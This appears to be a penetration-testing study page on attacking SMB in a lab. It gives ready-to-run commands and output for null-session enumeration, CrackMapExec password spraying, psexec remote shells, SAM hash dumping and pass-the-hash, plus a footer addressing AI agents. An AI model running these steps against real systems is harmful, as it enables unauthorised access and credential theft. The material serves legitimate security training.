# Attacking SMB ## Enumeration Depending on the SMB implementation and the operating system, we will get different information using `Nmap`. Keep in mind that when targetting Windows OS, version information is usually not included as part of the Nmap scan results. Instead, Nmap will try to guess the OS version. However, we will often need other scans to identify if the target is vulnerable to a particular exploit. We will cover searching for known vulnerabilities later in this section. For now, let's scan ports 139 and 445 TCP. ```shell-session eldeim@htb[/htb]$ sudo nmap 10.129.14.128 -sV -sC -p139,445 Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-19 15:15 CEST Nmap scan report for 10.129.14.128 Host is up (0.00024s latency). PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Samba smbd 4.6.2 445/tcp open netbios-ssn Samba smbd 4.6.2 MAC Address: 00:00:00:00:00:00 (VMware) Host script results: |_nbstat: NetBIOS name: HTB, NetBIOS user: , NetBIOS MAC: (unknown) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-09-19T13:16:04 |_ start_date: N/A ``` The Nmap scan reveals essential information about the target: * SMB version (Samba smbd 4.6.2) * Hostname HTB * Operating System is Linux based on SMB implementation *** ## Misconfigurations SMB can be configured not to require authentication, which is often called a `null session`. Instead, we can log in to a system with no username or password. ### **Anonymous Authentication** If we find an SMB server that does not require a username and password or find valid credentials, we can get a list of shares, usernames, groups, permissions, policies, services, etc. Most tools that interact with SMB allow null session connectivity, including `smbclient`, `smbmap`, `rpcclient`, or `enum4linux`. Let's explore how we can interact with file shares and RPC using null authentication. ### **File Share** Using `smbclient`, we can display a list of the server's shares with the option `-L`, and using the option `-N`, we tell `smbclient` to use the null session. ```shell-session eldeim@htb[/htb]$ smbclient -N -L //10.129.14.128 Sharename Type Comment ------- -- ------- ADMIN$ Disk Remote Admin C$ Disk Default share notes Disk CheckIT IPC$ IPC IPC Service (DEVSM) SMB1 disabled no workgroup available ``` `Smbmap` is another tool that helps us enumerate network shares and access associated permissions. An advantage of `smbmap` is that it provides a list of permissions for each shared folder. ```shell-session eldeim@htb[/htb]$ smbmap -H 10.129.14.128 [+] IP: 10.129.14.128:445 Name: 10.129.14.128 Disk Permissions Comment -- --------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY IPC Service (DEVSM) notes READ, WRITE CheckIT ``` Using `smbmap` with the `-r` or `-R` (recursive) option, one can browse the directories: ```shell-session eldeim@htb[/htb]$ smbmap -H 10.129.14.128 -r notes [+] Guest session IP: 10.129.14.128:445 Name: 10.129.14.128 Disk Permissions Comment -- --------- ------- notes READ, WRITE .\notes\* dr--r--r 0 Mon Nov 2 00:57:44 2020 . dr--r--r 0 Mon Nov 2 00:57:44 2020 .. dr--r--r 0 Mon Nov 2 00:57:44 2020 LDOUJZWBSG fw--w--w 116 Tue Apr 16 07:43:19 2019 note.txt fr--r--r 0 Fri Feb 22 07:43:28 2019 SDT65CB.tmp dr--r--r 0 Mon Nov 2 00:54:57 2020 TPLRNSMWHQ dr--r--r 0 Mon Nov 2 00:56:51 2020 WDJEQFZPNO dr--r--r 0 Fri Feb 22 07:44:02 2019 WindowsImageBackup ``` From the above example, the permissions are set to `READ` and `WRITE`, which one can use to upload and download the files. ```shell-session eldeim@htb[/htb]$ smbmap -H 10.129.14.128 --download "notes\note.txt" [+] Starting download: notes\note.txt (116 bytes) [+] File output to: /htb/10.129.14.128-notes_note.txt ``` ```shell-session eldeim@htb[/htb]$ smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt" [+] Starting upload: test.txt (20 bytes) [+] Upload complete. ``` ## **Remote Procedure Call (RPC)** We can use the `rpcclient` tool with a null session to enumerate a workstation or Domain Controller. The `rpcclient` tool offers us many different commands to execute specific functions on the SMB server to gather information or modify server attributes like a username. We can use this [cheat sheet from the SANS Institute](https://www.willhackforsushi.com/sec504/SMB-Access-from-Linux.pdf) or review the complete list of all these functions found on the [man page](https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html) of the `rpcclient`. ```shell-session eldeim@htb[/htb]$ rpcclient -U'%' 10.10.110.17 rpcclient $> enumdomusers user:[mhope] rid:[0x641] user:[svc-ata] rid:[0xa2b] user:[svc-bexec] rid:[0xa2c] user:[roleary] rid:[0xa36] user:[smorgan] rid:[0xa37] ``` `Enum4linux` is another utility that supports null sessions, and it utilizes `nmblookup`, `net`, `rpcclient`, and `smbclient` to automate some common enumeration from SMB targets such as: * Workgroup/Domain name * Users information * Operating system information * Groups information * Shares Folders * Password policy information The [original tool](https://github.com/CiscoCXSecurity/enum4linux) was written in Perl and [rewritten by Mark Lowe in Python](https://github.com/cddmp/enum4linux-ng). ```shell-session eldeim@htb[/htb]$ ./enum4linux-ng.py 10.10.11.45 -A -C ENUM4LINUX - next generation ========================== | Target Information | ========================== [*] Target ........... 10.10.11.45 [*] Username ......... '' [*] Random Username .. 'noyyglci' [*] Password ......... '' ==================================== | Service Scan on 10.10.11.45 | ==================================== [*] Checking LDAP (timeout: 5s) [-] Could not connect to LDAP on 389/tcp: connection refused [*] Checking LDAPS (timeout: 5s) [-] Could not connect to LDAPS on 636/tcp: connection refused [*] Checking SMB (timeout: 5s) [*] SMB is accessible on 445/tcp [*] Checking SMB over NetBIOS (timeout: 5s) [*] SMB over NetBIOS is accessible on 139/tcp =================================================== | NetBIOS Names and Workgroup for 10.10.11.45 | =================================================== [*] Got domain/workgroup name: WORKGROUP [*] Full NetBIOS names information: - WIN-752039204 <00> - B Workstation Service - WORKGROUP <00> - B Workstation Service - WIN-752039204 <20> - B Workstation Service - MAC Address = 00-0C-29-D7-17-DB ... ======================================== | SMB Dialect Check on 10.10.11.45 | ======================================== ``` ## **Brute Forcing and Password Spray** When brute-forcing, we try as many passwords as possible against an account, but it can lock out an account if we hit the threshold. We can use brute-forcing and stop before reaching the threshold if we know it. Otherwise, we do not recommend using brute force. Password spraying is a better alternative since we can target a list of usernames with one common password to avoid account lockouts. We can try more than one password if we know the account lockout threshold. Typically, two to three attempts are safe, provided we wait 30-60 minutes between attempts. Let's explore the tool [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) that includes the ability to execute password spraying. With CrackMapExec (CME), we can target multiple IPs, using numerous users and passwords. Let's explore an everyday use case for password spraying. To perform a password spray against one IP, we can use the option `-u` to specify a file with a user list and `-p` to specify a password. This will attempt to authenticate every user from the list using the provided password. ```shell-session eldeim@htb[/htb]$ cat /tmp/userlist.txt Administrator jrodriguez admin jurena ``` Attacking SMB ```shell-session eldeim@htb[/htb]$ crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth SMB 10.10.110.17 445 WIN7BOX [*] Windows 10.0 Build 18362 (name:WIN7BOX) (domain:WIN7BOX) (signing:False) (SMBv1:False) SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\Administrator:Company01! STATUS_LOGON_FAILURE SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\jrodriguez:Company01! STATUS_LOGON_FAILURE SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\admin:Company01! STATUS_LOGON_FAILURE SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\eperez:Company01! STATUS_LOGON_FAILURE SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\amone:Company01! STATUS_LOGON_FAILURE SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\fsmith:Company01! STATUS_LOGON_FAILURE SMB 10.10.110.17 445 WIN7BOX [-] WIN7BOX\tcrash:Company01! STATUS_LOGON_FAILURE SMB 10.10.110.17 445 WIN7BOX [+] WIN7BOX\jurena:Company01! (Pwn3d!) ``` > Note: By default CME will exit after a successful login is found. Using the `--continue-on-success` flag will continue spraying even after a valid password is found. it is very useful for spraying a single password against a large user list. Additionally, if we are targetting a non-domain joined computer, we will need to use the option `--local-auth`. For a more detailed study Password Spraying see the Active Directory Enumeration & Attacks module. ## **Remote Code Execution (RCE)** We can download PsExec from [Microsoft website](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec), or we can use some Linux implementations: * [Impacket PsExec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py) - Python PsExec like functionality example using [RemComSvc](https://github.com/kavika13/RemCom). * [Impacket SMBExec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py) - A similar approach to PsExec without using [RemComSvc](https://github.com/kavika13/RemCom). The technique is described [here](https://web.archive.org/web/20190515131124/https://www.optiv.com/blog/owning-computers-without-shell-access). This implementation goes one step further, instantiating a local SMB server to receive the output of the commands. This is useful when the target machine does NOT have a writeable share available. * [Impacket atexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py) - This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command. * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) - includes an implementation of `smbexec` and `atexec`. * [Metasploit PsExec](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/smb/psexec.md) - Ruby PsExec implementation. ### **Impacket PsExec** To use `impacket-psexec`, we need to provide the domain/username, the password, and the IP address of our target machine. For more detailed information we can use impacket help: ```shell-session eldeim@htb[/htb]$ impacket-psexec -h Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation usage: psexec.py [-h] [-c pathname] [-path PATH] [-file FILE] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address] [-target-ip ip address] [-port [destination port]] [-service-name service_name] [-remote-binary-name remote_binary_name] target [command ...] PSEXEC like functionality example using RemComSvc. positional arguments: target [[domain/]username[:password]@] command command (or arguments if -c is used) to execute at the target (w/o path) - (default:cmd.exe) optional arguments: -h, --help show this help message and exit -c pathname copy the filename for later execution, arguments are passed in the command option -path PATH path of the command to execute -file FILE alternative RemCom binary (be sure it doesn't require CRT) -ts adds timestamp to every logging output -debug Turn DEBUG output ON authentication: -hashes LMHASH:NTHASH NTLM hashes, format is LMHASH:NTHASH -no-pass don't ask for password (useful for -k) -k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line -aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits) -keytab KEYTAB Read keys for SPN from keytab file connection: -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter -target-ip ip address IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve it -port [destination port] Destination port to connect to SMB Server -service-name service_name The name of the service used to trigger the payload -remote-binary-name remote_binary_name This will be the name of the executable uploaded on the target ``` To connect to a remote machine with a local administrator account, using `impacket-psexec`, you can use the following command: ```shell-session eldeim@htb[/htb]$ impacket-psexec administrator:'Password123!'@10.10.110.17 Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation [*] Requesting shares on 10.10.110.17..... [*] Found writable share ADMIN$ [*] Uploading file EHtJXgng.exe [*] Opening SVCManager on 10.10.110.17..... [*] Creating service nbAc on 10.10.110.17..... [*] Starting service nbAc..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.19041.1415] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami && hostname nt authority\system WIN7BOX ``` The same options apply to `impacket-smbexec` and `impacket-atexec`. ### **CrackMapExec** Another tool we can use to run CMD or PowerShell is `CrackMapExec`. One advantage of `CrackMapExec` is the availability to run a command on multiples host at a time. To use it, we need to specify the protocol, `smb`, the IP address or IP address range, the option `-u` for username, and `-p` for the password, and the option `-x` to run cmd commands or uppercase `-X` to run PowerShell commands. ```shell-session eldeim@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec SMB 10.10.110.17 445 WIN7BOX [*] Windows 10.0 Build 19041 (name:WIN7BOX) (domain:.) (signing:False) (SMBv1:False) SMB 10.10.110.17 445 WIN7BOX [+] .\Administrator:Password123! (Pwn3d!) SMB 10.10.110.17 445 WIN7BOX [+] Executed command via smbexec SMB 10.10.110.17 445 WIN7BOX nt authority\system ``` > Note: If the`--exec-method` is not defined, CrackMapExec will try to execute the atexec method, if it fails you can try to specify the `--exec-method` smbexec. ### **Enumerating Logged-on Users** Imagine we are in a network with multiple machines. Some of them share the same local administrator account. In this case, we could use `CrackMapExec` to enumerate logged-on users on all machines within the same network `10.10.110.17/24`, which speeds up our enumeration process. ```shell-session eldeim@htb[/htb]$ crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users SMB 10.10.110.17 445 WIN7BOX [*] Windows 10.0 Build 18362 (name:WIN7BOX) (domain:WIN7BOX) (signing:False) (SMBv1:False) SMB 10.10.110.17 445 WIN7BOX [+] WIN7BOX\administrator:Password123! (Pwn3d!) SMB 10.10.110.17 445 WIN7BOX [+] Enumerated loggedon users SMB 10.10.110.17 445 WIN7BOX WIN7BOX\Administrator logon_server: WIN7BOX SMB 10.10.110.17 445 WIN7BOX WIN7BOX\jurena logon_server: WIN7BOX SMB 10.10.110.21 445 WIN10BOX [*] Windows 10.0 Build 19041 (name:WIN10BOX) (domain:WIN10BOX) (signing:False) (SMBv1:False) SMB 10.10.110.21 445 WIN10BOX [+] WIN10BOX\Administrator:Password123! (Pwn3d!) SMB 10.10.110.21 445 WIN10BOX [+] Enumerated loggedon users SMB 10.10.110.21 445 WIN10BOX WIN10BOX\demouser logon_server: WIN10BOX ``` ### **Extract Hashes from SAM Database** The Security Account Manager (SAM) is a database file that stores users' passwords. It can be used to authenticate local and remote users. If we get administrative privileges on a machine, we can extract the SAM database hashes for different purposes: * Authenticate as another user. * Password Cracking, if we manage to crack the password, we can try to reuse the password for other services or accounts. * Pass The Hash. We will discuss it later in this section. ```shell-session eldeim@htb[/htb]$ crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam SMB 10.10.110.17 445 WIN7BOX [*] Windows 10.0 Build 18362 (name:WIN7BOX) (domain:WIN7BOX) (signing:False) (SMBv1:False) SMB 10.10.110.17 445 WIN7BOX [+] WIN7BOX\administrator:Password123! (Pwn3d!) SMB 10.10.110.17 445 WIN7BOX [+] Dumping SAM hashes SMB 10.10.110.17 445 WIN7BOX Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe::: SMB 10.10.110.17 445 WIN7BOX Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.10.110.17 445 WIN7BOX DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SMB 10.10.110.17 445 WIN7BOX WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:5717e1619e16b9179ef2e7138c749d65::: SMB 10.10.110.17 445 WIN7BOX jurena:1001:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634::: SMB 10.10.110.17 445 WIN7BOX demouser:1002:aad3b435b51404eeaad3b435b51404ee:4c090b2a4a9a78b43510ceec3a60f90b::: SMB 10.10.110.17 445 WIN7BOX [+] Added 6 SAM hashes to the database ``` ### **Pass-the-Hash (PtH)** If we manage to get an NTLM hash of a user, and if we cannot crack it, we can still use the hash to authenticate over SMB with a technique called Pass-the-Hash (PtH). PtH allows an attacker to authenticate to a remote server or service using the underlying NTLM hash of a user's password instead of the plaintext password. We can use a PtH attack with any `Impacket` tool, `SMBMap`, `CrackMapExec`, among other tools. Here is an example of how this would work with `CrackMapExec`: ```shell-session eldeim@htb[/htb]$ crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE SMB 10.10.110.17 445 WIN7BOX [*] Windows 10.0 Build 19041 (name:WIN7BOX) (domain:WIN7BOX) (signing:False) (SMBv1:False) SMB 10.10.110.17 445 WIN7BOX [+] WIN7BOX\Administrator:2B576ACBE6BCFDA7294D6BD18041B8FE (Pwn3d!) ``` \
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://eldeim.gitbook.io/brain_fuck/notes/certifications/eastereggs/htb-cpts/attacking-common-services/attacking-smb.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.